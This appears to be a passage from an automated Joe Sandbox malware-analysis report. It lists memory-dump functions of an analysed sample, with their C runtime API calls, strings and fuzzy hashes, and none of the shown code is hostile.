Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __invalid_parameter_memset
String ID:
API String ID: 3961059608-0
Opcode ID: e48392b6c7511a6d38d4083fc33270918b339852cb7f3cda31c00d3e965a3eab
Instruction ID: 99ab8d1f36e6e1ebba7e0c593a17ea5259723433611ee9d53a8f2a175ac5d7e6
Opcode Fuzzy Hash: e48392b6c7511a6d38d4083fc33270918b339852cb7f3cda31c00d3e965a3eab
Instruction Fuzzy Hash: D811C8B1B40204BBCB04DF54EC42F5E37A8AB54704F50C15AF908AB2C1D678EF10CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00580DF8, Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00580223,?,?), ref: 00580E02
SetErrorMode.KERNELBASE(00000000,?,?,00580223,?,?), ref: 00580E07

Memory Dump Source

Source File: 00000016.00000002.398200005.0000000000580000.00000040.00000001.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_580000_5D68.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: a992885c89bf85eb39910f3b5de41249294542621b3f1e7a83cd92281d1157c4
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: A8D0123224522CB7DB403A94DC09BCEBF1CAF05BA7F008021FB0DE9581CBB09A4047EA

Uniqueness

Uniqueness Score: -1.00%

Function 00432ED4, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__nh_malloc_dbg.LIBCMTD ref: 00432EEB
__nh_malloc_dbg.LIBCMTD ref: 00433017

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __nh_malloc_dbg
String ID:
API String ID: 2526938719-0
Opcode ID: fffe5a05e61990dd2a135c349ea6a216f840e1672319c85ebccd46cf4489ec26
Instruction ID: 8ad3abc6a0c3d2189f74fc65ef30e2723389f83c5d1bc21fdaab64411c011c21
Opcode Fuzzy Hash: fffe5a05e61990dd2a135c349ea6a216f840e1672319c85ebccd46cf4489ec26
Instruction Fuzzy Hash: D4E02071F8470499D7308B555C077687320E704735F60836FD235361C1D6B511008F09

Uniqueness

Uniqueness Score: -1.00%

Function 0042EC10, Relevance: 1.5, APIs: 1, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 0042EC17

Part of subcall function 0042EB40: __crt_wait_module_handle.LIBCMTD ref: 0042EB8C
Part of subcall function 0042EB40: RtlEncodePointer.NTDLL(?), ref: 0042EBC7

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: EncodePointer__crt_wait_module_handle__encode_pointer
String ID:
API String ID: 2010845264-0
Opcode ID: ca3bb93ff45a55e1c9c205d3af94546bf3f1e89c60e368c40be708a0837e9a1b
Instruction ID: 6f2b92429c13a5953b755885e49409bb3b6b319ed74be1ce1c640177e5cfe840
Opcode Fuzzy Hash: ca3bb93ff45a55e1c9c205d3af94546bf3f1e89c60e368c40be708a0837e9a1b
Instruction Fuzzy Hash: C2A0126254420823D04030833813B02790C43C0639E4C0021F60D051422842B4104097

Uniqueness

Uniqueness Score: -1.00%

Function 004234C0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

___security_init_cookie.LIBCMTD ref: 004234C5

Part of subcall function 004234E0: _check_managed_app.LIBCMTD ref: 0042355C
Part of subcall function 004234E0: __heap_init.LIBCMTD ref: 00423566
Part of subcall function 004234E0: _fast_error_exit.LIBCMTD ref: 00423574
Part of subcall function 004234E0: __mtinit.LIBCMTD ref: 0042357C
Part of subcall function 004234E0: _fast_error_exit.LIBCMTD ref: 00423587
Part of subcall function 004234E0: __RTC_Initialize.LIBCMTD ref: 00423599
Part of subcall function 004234E0: ___crtGetEnvironmentStringsW.LIBCMTD ref: 004235C2
Part of subcall function 004234E0: ___wsetargv.LIBCMTD ref: 004235CC
Part of subcall function 004234E0: __wsetenvp.LIBCMTD ref: 004235DF
Part of subcall function 004234E0: __cinit.LIBCMTD ref: 004235F4
Part of subcall function 004234E0: __wwincmdln.LIBCMTD ref: 00423611

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _fast_error_exit$EnvironmentInitializeStrings___crt___security_init_cookie___wsetargv__cinit__heap_init__mtinit__wsetenvp__wwincmdln_check_managed_app
String ID:
API String ID: 3809881541-0
Opcode ID: ed77464eb8862c02e5a4258c802415a926824b731f688e607adee3ad985c05c6
Instruction ID: 9ebe18ec82d4d15ee476d857766174c6bdd332a121b3df26ac61f1be310b02cc
Opcode Fuzzy Hash: ed77464eb8862c02e5a4258c802415a926824b731f688e607adee3ad985c05c6
Instruction Fuzzy Hash: 6CA02222000A2C0308223BE3300380A320C08C032EBC200BBB83C020030C0EBE0080AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041C92B, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,0041CE7D,?,?,?,?,00423645,00400000,00000000,?,0000000A), ref: 0041C933

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 4b58f2a9ff7883878600db57692c0094cdcdbfc0774de0bc8ee88b7fd2131600
Instruction ID: 02b34e6ad64935d866b02a7ad3d8adf186fdb8b1a1fb809bfe37f0ce95fbd004
Opcode Fuzzy Hash: 4b58f2a9ff7883878600db57692c0094cdcdbfc0774de0bc8ee88b7fd2131600
Instruction Fuzzy Hash: 7DB01271410300CFDB004FB0AD067003E60A304713F004034E30C915B1C73044009F18

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0042F6DE, Relevance: 51.2, APIs: 25, Strings: 4, Instructions: 431COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 0042F722
_wcscat_s.LIBCMTD ref: 0042F93A

Part of subcall function 00439350: __invalid_parameter.LIBCMTD ref: 004393C2

__invoke_watson_if_error.LIBCMTD ref: 0042F943

Part of subcall function 00422A70: __invoke_watson.LIBCMTD ref: 00422A91

_wcscat_s.LIBCMTD ref: 0042F972

Part of subcall function 00439350: _memset.LIBCMT ref: 0043942B
Part of subcall function 00439350: __invalid_parameter.LIBCMTD ref: 00439487

__invoke_watson_if_error.LIBCMTD ref: 0042F97B
__snwprintf_s.LIBCMTD ref: 0042F9D4

Part of subcall function 00436E30: __vsnprintf_s_l.LIBCMTD ref: 00436E52

__invoke_watson_if_oneof.LIBCMTD ref: 0042FA0D
_wcscpy_s.LIBCMTD ref: 0042FA52
__invoke_watson_if_error.LIBCMTD ref: 0042FA5B
__cftoe.LIBCMTD ref: 0042FACF
__invoke_watson_if_oneof.LIBCMTD ref: 0042FAFE
_wcscpy_s.LIBCMTD ref: 0042FB36
__invoke_watson_if_error.LIBCMTD ref: 0042FB3F
__itow_s.LIBCMTD ref: 0042F719

Part of subcall function 00429840: _xtow_s@20.LIBCMTD ref: 0042986B

__strftime_l.LIBCMTD ref: 0042F7D9
__invoke_watson_if_oneof.LIBCMTD ref: 0042F812
_wcscpy_s.LIBCMTD ref: 0042F857
__invoke_watson_if_error.LIBCMTD ref: 0042F860
_wcscpy_s.LIBCMTD ref: 0042F8B3
__invoke_watson_if_error.LIBCMTD ref: 0042F8BC
_wcscat_s.LIBCMTD ref: 0042F8ED
__invoke_watson_if_error.LIBCMTD ref: 0042F8F6

Strings

hx_@, xrefs: 0042F8D0
t8j, xrefs: 0042FB0D
hx_@, xrefs: 0042FAE9
t9j, xrefs: 0042FD65

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __invoke_watson_if_error$_wcscpy_s$__invoke_watson_if_oneof_wcscat_s$__invalid_parameter$__cftoe__invoke_watson__itow_s__snwprintf_s__strftime_l__vsnprintf_s_l_memset_xtow_s@20
String ID: hx_@$hx_@$t8j$t9j
API String ID: 2582952045-1707723877
Opcode ID: 5bdd61315b5de1141821f34d4f66a059573e4d1989bd6cab6ea5258daef66be1
Instruction ID: 876a4c81be37a31778ac198fabfa9a24270b37a21378cf78e8776fcfe0e35468
Opcode Fuzzy Hash: 5bdd61315b5de1141821f34d4f66a059573e4d1989bd6cab6ea5258daef66be1
Instruction Fuzzy Hash: 6F0296B0A40728ABDB20DF50EC4AF9F7374AB48745F9041BAF509762C1D7B85A84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0043EA43, Relevance: 25.8, APIs: 17, Instructions: 296COMMON

Download Yara Rule

APIs

_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0043EA8B
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0043EAC1
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0043EAE2
wcsncnt.LIBCMTD ref: 0043EB19
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0043EB7F
_wcslen.LIBCMTD ref: 0043ED8F
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0043ED9D

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: Locale$UpdateUpdate::~_$_wcslenwcsncnt
String ID:
API String ID: 1043867012-0
Opcode ID: a8ffe6901c5590db246b1764e7c65ab74768f6dd80f77168b5b8b69f5ad94237
Instruction ID: 33d6e4121f9747ef53f5616068873bfd9d6df53fdaaafae9c0bdec0403de4805
Opcode Fuzzy Hash: a8ffe6901c5590db246b1764e7c65ab74768f6dd80f77168b5b8b69f5ad94237
Instruction Fuzzy Hash: CED13731A01118DFCF14DF95D895BEEBBB1BF48304F60915AE4266B2E1DB38AE41CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043CF69, Relevance: 24.9, APIs: 11, Strings: 3, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0043CFF8
_get_int64_arg.LIBCMTD ref: 0043D020
__aullrem.LIBCMT ref: 0043D1C5
__aulldiv.LIBCMT ref: 0043D1E7
_write_multi_char.LIBCMTD ref: 0043D2EE
_write_string.LIBCMTD ref: 0043D309
_write_multi_char.LIBCMTD ref: 0043D335
_wctomb_s.LIBCMTD ref: 0043D3B2

Strings

9, xrefs: 0043D1F8
-, xrefs: 0043D28E
_output_s_l, xrefs: 0043C65E

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_wctomb_s_write_string
String ID: -$9$_output_s_l
API String ID: 3451365851-2997124954
Opcode ID: c34fdc31b3d6dfc56024792464813d90b10f6a2b54b22b933658048f8c939edd
Instruction ID: 057d0e0b532a5f34e1f70459ac0f7b82f93ef58941437c4aa4933052d210732c
Opcode Fuzzy Hash: c34fdc31b3d6dfc56024792464813d90b10f6a2b54b22b933658048f8c939edd
Instruction Fuzzy Hash: B3F138B1D012299FDF24DF58DC89BAEB7B1BB48304F1491DAE419A7281D7389E80CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042BE8B, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 365COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042BF20
_get_int64_arg.LIBCMTD ref: 0042BF48
__aullrem.LIBCMT ref: 0042C0F0
__aulldiv.LIBCMT ref: 0042C112
_write_multi_char.LIBCMTD ref: 0042C22B
_write_string.LIBCMTD ref: 0042C246
_write_multi_char.LIBCMTD ref: 0042C272
__mbtowc_l.LIBCMTD ref: 0042C2E1

Strings

9, xrefs: 0042C123

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
String ID: 9
API String ID: 3455034128-2366072709
Opcode ID: 018d3b48c7647d4f98e7a45b89857224bcc677ec28df479b3300f214192bf2f9
Instruction ID: cac759e53a3d4d55eadbcad45a721fa7f27d4d674edd159a0287911f5da512d1
Opcode Fuzzy Hash: 018d3b48c7647d4f98e7a45b89857224bcc677ec28df479b3300f214192bf2f9
Instruction Fuzzy Hash: 2FF119B1E002299FDB24CF94DC81BAEB7B5FF45304F54819AE509A7241D738AE84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0043CCC7, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 241COMMON

Download Yara Rule

APIs

__get_printf_count_output.LIBCMTD ref: 0043CCD9
__invalid_parameter.LIBCMTD ref: 0043CD60
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0043CD75
_write_multi_char.LIBCMTD ref: 0043D2EE
_write_string.LIBCMTD ref: 0043D309
_write_multi_char.LIBCMTD ref: 0043D335
_wctomb_s.LIBCMTD ref: 0043D3B2

Strings

-, xrefs: 0043D28E
_output_s_l, xrefs: 0043C65E, 0043CD56

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_wctomb_s_write_string
String ID: -$_output_s_l
API String ID: 4103101190-3200142626
Opcode ID: e09871d713c7fce511c34ab3ccad626a40740fb1bc897f036003ce28900ffafd
Instruction ID: 862ad3d9e1f39e02914d29a2d06071da4c75001e9d4414168410740683d5eba7
Opcode Fuzzy Hash: e09871d713c7fce511c34ab3ccad626a40740fb1bc897f036003ce28900ffafd
Instruction Fuzzy Hash: F9A19FB0D012289BDF24DF55DC89BEEB7B0EB48304F1091DAE4197A281D778AE80CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043CB15, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0043CB49
_write_multi_char.LIBCMTD ref: 0043D2EE
_write_string.LIBCMTD ref: 0043D309
_write_multi_char.LIBCMTD ref: 0043D335
_wctomb_s.LIBCMTD ref: 0043D3B2

Strings

-, xrefs: 0043D28E
_output_s_l, xrefs: 0043C65E

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _write_multi_char$_strlen_wctomb_s_write_string
String ID: -$_output_s_l
API String ID: 433996309-3200142626
Opcode ID: 722ba824d80c1d1e3cf7603c54c57d3f1f93d4b9ec2d8cb78bea161389f9ac9c
Instruction ID: 4e01ee97c29d4fa2e604f8a132b6f0365d7af617ffca67a9c423443c0e708d73
Opcode Fuzzy Hash: 722ba824d80c1d1e3cf7603c54c57d3f1f93d4b9ec2d8cb78bea161389f9ac9c
Instruction Fuzzy Hash: 55A16AB0D012289FDB24CF54DC89BEEB7B1AB48305F1491DAE4197B291D778AE80CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0042BBEA, Relevance: 15.2, APIs: 10, Instructions: 238COMMON

Download Yara Rule

APIs

__get_printf_count_output.LIBCMTD ref: 0042BBFC
__invalid_parameter.LIBCMTD ref: 0042BC83
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0042BC98
_write_multi_char.LIBCMTD ref: 0042C22B
_write_string.LIBCMTD ref: 0042C246
_write_multi_char.LIBCMTD ref: 0042C272
__mbtowc_l.LIBCMTD ref: 0042C2E1

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_write_string
String ID:
API String ID: 900999819-0
Opcode ID: 7a152b0ef7358fdfdf488b90299700bab049567fc5c59cf70dd7079f0d1c9e8c
Instruction ID: ca2ee91092aafdb62780697932ab8c6bba3a466795aca646819d84370a4d8f02
Opcode Fuzzy Hash: 7a152b0ef7358fdfdf488b90299700bab049567fc5c59cf70dd7079f0d1c9e8c
Instruction Fuzzy Hash: 57A183B0E002289BDF24DF55DC81BAEB770EF44304F94859AE6096B282D7785E84CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 00438FF0, Relevance: 15.1, APIs: 10, Instructions: 135COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00438FFE

Part of subcall function 00439280: _cmpBYTE.LIBCMTD ref: 004392B8

_cmpDWORD.LIBCMTD ref: 00439025

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
Instruction ID: f25fb2f7a0819abbe322da5feeaa82c6f032b63a035de58cf9bb3e626f1f4a8f
Opcode Fuzzy Hash: c8f3e292c3b1e8bb93b3af797200ed8ae75d1eaad313a1fa08ee5c27a5052a11
Instruction Fuzzy Hash: F7512AB1D00109FFDB04DFBCDA48ADEBBB5AB48304F10955AE409BB245DA789F41EB54

Uniqueness

Uniqueness Score: -1.00%

Function 00428AA0, Relevance: 13.7, APIs: 9, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc3978a91e2fed697cbd145494d9bee859de4c37696e3cdea482a0f53b07a0eb
Instruction ID: 79dac7c46b9d9e39020c28a066436a2692e4869eee9c1b7d6f35de62e4dada77
Opcode Fuzzy Hash: cc3978a91e2fed697cbd145494d9bee859de4c37696e3cdea482a0f53b07a0eb
Instruction Fuzzy Hash: E481C3B1B01218ABDF00DF54EC81FAF77B5AF48304F40846EF909A7281D7789A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC54, Relevance: 13.6, APIs: 9, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041EC59
std::_Lockit::_Lockit.LIBCPMTD ref: 0041EC68
int.LIBCPMT ref: 0041EC7F

Part of subcall function 0041D1C1: std::_Lockit::_Lockit.LIBCPMTD ref: 0041D1D2
Part of subcall function 0041D1C1: std::_Lockit::~_Lockit.LIBCPMTD ref: 0041D1EC

std::locale::_Getfacet.LIBCPMT ref: 0041EC88
std::bad_exception::bad_exception.LIBCMTD ref: 0041ECB6
__CxxThrowException@8.LIBCMTD ref: 0041ECC4
std::locale::facet::_Incref.LIBCPMT ref: 0041ECD4
std::locale::facet::facet_Register.LIBCPMTD ref: 0041ECDA
std::_Lockit::~_Lockit.LIBCPMTD ref: 0041ECE7

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Exception@8GetfacetH_prologIncrefRegisterThrowstd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
String ID:
API String ID: 288561801-0
Opcode ID: 54da9261730169bf02645b48c785f6184d57676b9d74fd18ddbc20c023d86ca5
Instruction ID: 5d5fdbcd47ae09a5643023b666f8b08548eb51aaf07b8b350aacd09a0fcab939
Opcode Fuzzy Hash: 54da9261730169bf02645b48c785f6184d57676b9d74fd18ddbc20c023d86ca5
Instruction Fuzzy Hash: 9411A376A00214ABCB04EB62DD42AEE7735EF80368F10052FF911672D1DB7C9945C79D

Uniqueness

Uniqueness Score: -1.00%

Function 004259E5, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 264memoryCOMMON

Download Yara Rule

APIs

_CheckBytes.LIBCMTD ref: 004259F9
__CrtIsValidHeapPointer.LIBCMTD ref: 00425A85
_CheckBytes.LIBCMTD ref: 00425B30
_CheckBytes.LIBCMTD ref: 00425BEA
_memset.LIBCMT ref: 00425CE1
__free_base.LIBCMTD ref: 00425CED

Strings

tDj, xrefs: 00425A3B

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: BytesCheck$HeapPointerValid__free_base_memset
String ID: tDj
API String ID: 25084783-2513116121
Opcode ID: 2196346b72de99ad033b085079edf412ac61bfd6a4851d5f2201b87a2c60ca13
Instruction ID: c2196b15d096f99c2b095510ac6125d9018437076f0548a4c77f008faf9f2775
Opcode Fuzzy Hash: 2196346b72de99ad033b085079edf412ac61bfd6a4851d5f2201b87a2c60ca13
Instruction Fuzzy Hash: 1991D074B40214BBEB24CF44ED82F6A7365AB58705F74419AF604AB3C2D279EE40CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 0043F034, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 115COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043F093
_memset.LIBCMT ref: 0043F11C
__invalid_parameter.LIBCMTD ref: 0043F17B

Strings

_wcstombs_s_l, xrefs: 0043F171
sizeInBytes > retsize, xrefs: 0043F133, 0043F176
P, xrefs: 0043F190
f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c, xrefs: 0043F13F, 0043F16C

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _memset$__invalid_parameter
String ID: P$_wcstombs_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c$sizeInBytes > retsize
API String ID: 2178901135-56445615
Opcode ID: eba7a8a6db21c0625dc80c26c2fdd3a8b19e208fd7be417d8f693bd9a4897978
Instruction ID: dc0ffcc58b18e2643ddf0dd2ef6f6a62c9a4abd568b7092f9c28664f814976b7
Opcode Fuzzy Hash: eba7a8a6db21c0625dc80c26c2fdd3a8b19e208fd7be417d8f693bd9a4897978
Instruction Fuzzy Hash: C641A230E00249EBCF14CF58D845BAE7771FB48324F14866AE8242A3D1D3799D59CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0042BA14, Relevance: 12.2, APIs: 8, Instructions: 222COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 0042BA48
_write_multi_char.LIBCMTD ref: 0042C22B
_write_string.LIBCMTD ref: 0042C246
_write_multi_char.LIBCMTD ref: 0042C272
__mbtowc_l.LIBCMTD ref: 0042C2E1

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _write_multi_char$__mbtowc_l_strlen_write_string
String ID:
API String ID: 3252303123-0
Opcode ID: 147f7b57c91fc7ac388040de3b26c44f6af553ab85c17ef6030ac1a538fc8db6
Instruction ID: f89ba16a6660c1dacf5957cf631aa72163a71f909fe4458e2d75d23507538743
Opcode Fuzzy Hash: 147f7b57c91fc7ac388040de3b26c44f6af553ab85c17ef6030ac1a538fc8db6
Instruction Fuzzy Hash: 6DA15FB1E00228DBDB24DF55DC81BAEB7B5EB44304F54819AE5096B282D7389E84CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00438D98, Relevance: 12.1, APIs: 8, Instructions: 103COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00438DA6

Part of subcall function 00439280: _cmpBYTE.LIBCMTD ref: 004392B8

_cmpDWORD.LIBCMTD ref: 00438DCD

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
Instruction ID: d9394f98bafcc35a14a52f67a5d5268d9744483a6118b2dc5143d138524021cc
Opcode Fuzzy Hash: 000ccbe2cadb759e74cd5e7df1b3dfedffdf27a34ef9d4f6f82d792d1a5bf3d5
Instruction Fuzzy Hash: 6B314A71900208EFCB04DFBCDA48A9DBB75AB48308F50954DF40ABB205DA789F41DB95

Uniqueness

Uniqueness Score: -1.00%

Function 0043CF97, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0043CFF8
__aullrem.LIBCMT ref: 0043D1C5
__aulldiv.LIBCMT ref: 0043D1E7

Strings

0, xrefs: 0043CFB3
9, xrefs: 0043D1F8
', xrefs: 0043CF97

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: e4dd38e42e6af9c863dfc50a3d36f36b455022025e72cc688cd92708958d79a4
Instruction ID: c02270901f6d708d4f95b85d19d132a7bee07a7cad2efefa0e61f18ca3c343b2
Opcode Fuzzy Hash: e4dd38e42e6af9c863dfc50a3d36f36b455022025e72cc688cd92708958d79a4
Instruction Fuzzy Hash: F741C0B1D05629DFDF24CF98DC89BAEB7B5FB48304F24959AE009A7240C7389A85CF45

Uniqueness

Uniqueness Score: -1.00%

Function 00438EC4, Relevance: 10.6, APIs: 7, Instructions: 103COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00438ED2

Part of subcall function 00439280: _cmpBYTE.LIBCMTD ref: 004392B8

_cmpDWORD.LIBCMTD ref: 00438EF9

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
Instruction ID: dffb861a2e72acf67e1950e9055f91de04a9c3f164918d7deb64d20c70ccf4c8
Opcode Fuzzy Hash: 19dc914e4a0633765d336c19ed3a3f14afb2883500002485b60d4641ba5bd03d
Instruction Fuzzy Hash: D6313B71900208FFCB04DFBCDA48A9EBB75AB48308F20D559F40ABB205DA789F45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00438C80, Relevance: 10.6, APIs: 7, Instructions: 96COMMON

Download Yara Rule

APIs

_cmpDWORD.LIBCMTD ref: 00438C8E

Part of subcall function 00439280: _cmpBYTE.LIBCMTD ref: 004392B8

_cmpDWORD.LIBCMTD ref: 00438CB5

Memory Dump Source

Source File: 00000016.00000002.398093706.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_409000_5D68.jbxd

Similarity

API ID: _cmp
String ID:
API String ID: 2028851527-0
Opcode ID: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
Instruction ID: 9e6de795e3e082333dbc13ab13386c17264802dd361d4374196c23cda51d7268
Opcode Fuzzy Hash: 78c03d3718f2390d31f8b063bc65ce1d810f83c356c66c6654849dcd724319e6
Instruction Fuzzy Hash: 18313071900109FFDB04DFBCC948ADEBB75AB48309F209559F40ABB246DA789F41D758

Uniqueness

Uniqueness Score: -1.00%

Function 00431381, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 69COMMON

Download Yara Rule

APIs

__set_error_mode.LIBCMTD ref: 004313E8
